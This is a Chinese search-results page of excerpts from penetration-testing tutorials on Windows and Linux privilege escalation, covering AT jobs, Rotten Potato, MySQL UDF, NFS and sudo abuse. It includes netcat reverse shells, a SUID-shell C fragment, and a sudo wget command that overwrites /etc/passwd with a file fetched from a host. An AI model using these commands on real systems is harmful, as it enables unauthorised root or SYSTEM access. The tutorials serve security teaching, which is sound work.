首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

渗透测试之ASP Web

user 2.当成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚的用户登录进去就是system权限,再试试一般就可以了。...4.cmd命令:systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,如果没有,第一个是pr,第二个是巴西烤肉,第三个是iis6.0。...用途 C:\Program Files\ 默认用户组users对该目录拥有查看 可以查看服务器安装的应用软件...利用mysql的前提就是,服务器安装了mysql,mysql的服务没有降,是默认安装以系统权限继承的(system权限)....nc反弹 当可以执行net user,但是不能建立用户时,就可以用NC反弹试下,特别是内网服务器,最好用NC反弹

3.7K40

(一) AT命令

就是一个低权限向高权限转化的过程 基于之前的文章,我们获取了一个低权限账户,现在朝着高权限进发 我们现在既然有了低权限账号密码,那么我们就可以登陆3389等远程服务,从而使用一些本地的方法 在开始之前...Root 对于Linux来说,就只有两种权限,root,非root 其实对于非root也有两种情况,是否可以使用sudo 可以使用sudo的用户可以获取到部分root权限 ---- at命令...这个方法相对来说有些古老,之前我在一些技术书籍中还能看到 at 命令的原理是at 命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限 Win2003 & XP中还是存在的...可以看到我们的权限已经是system了 这个是本地,我们看看能不能远程(3389属于本地了哈) 远程需要反弹一个system的shell,我们以nc为例 首先我们用echo命令吧需要执行的命令写入到批处理中

3.7K30
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    什么是 为了提高自己在服务器中的权限所进行的操作 主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞上传shell,以夺得该服务器权限。...类别 本地 配置 漏洞 本地 1.AT命令 首先以administrator身份打开cmd ?...漏洞 烂土豆 属于令牌 限制条件 需要支持SeImpersonate或者SeAssignPrimaryToken权限 开启DCOM 本地支持RPC或者远程服务器支持PRC并能成功登录 能够找到可用的...数据库 1.my sql ①.udf 1、知道root账号密码 2、win2000,2003系统 3、需要secure_file_priv函数打开 利用自定义函数功能,将mysql账号换为系统...system权限 ②.mof 1、win2003 以下版本 2、secure_file_priv参数不为null ③.反弹shell 2.Sql server ①、有sa权限 ②、有dba

    2.3K72

    Linux姿势二:利用NFS

    如果在服务器上具有低特权shell,并且发现服务器中具有NFS共享,则可以使用它来升级特权。但是成功取决于它的配置方式。 目录 1.什么是NFS?...网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程计算机上的文件,就像它们位于用户自己的计算机上一样。...显示NFS客户端信息 # showmount 显示指定NFS服务器连接NFS客户端的信息 # showmount 192.168.1.1 #此ip为nfs服务器的 显示输出目录列表 # showmount...bash"); return 0; }' > /tmp/test/suid-shell.c 编译: gcc /tmp/test/suid-shell.c -o / tmp / 1 / suid-shel 赋:...好的,我们回到要服务器上 cd / tmp ./suid-shell ? 可以看到是ROOT权限了

    5.3K20

    Windows

    缓冲区溢出漏洞 缓冲区溢出(Buffer Overflow)是针对程序设计的缺陷,向程序输入使之溢出的内容,从而破坏程序运行乃至获得系统的控制。利用该漏洞的关键是目标机器没有及时安装补丁。...系统配置错误利用 Windows操作系统中常见的配置错误包括管理员凭据配置错误、服务配置错误、故意消弱的安全措施、用户权限过高等。...Metasploit 在msf中,可使用exploit/windows/local/service_permissions模块进行自动化,需要一个session 此模块使用两种发方法来:如果meterpreter...模块中AGGRESSIVE选项如果设置为ture,则是利用目标机器上每一个有漏洞的服务,设置为false则是在第一次成功后停止。...烂土豆就是MS16-075,是一个本地,不能用于域用户.

    1.8K90

    Linux姿势一:滥用SUDO

    在渗透中,我们拿到的webshell和反弹回来的shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo可以。...它能够将日志传到中心主机或者日志服务器。 § sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且输入它的密码时,用户获得了一张存活期为5分钟的票(这个值可以在编译的时候改变)。...touhid: 6 bxwJfzor sudo nano / etc / passwd 现在切换用户密码是:test su touhid 使用wget命令 这种非常酷的方式要求Web服务器下载文件。...仅附加此行=> touhid: 将passwd文件托管到使用任何Web服务器的主机。 在要主机方面。...sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd 现在切换用户密码是:test su touhid 注意:如果您要从服务器上转储文件

    11.7K20
    领券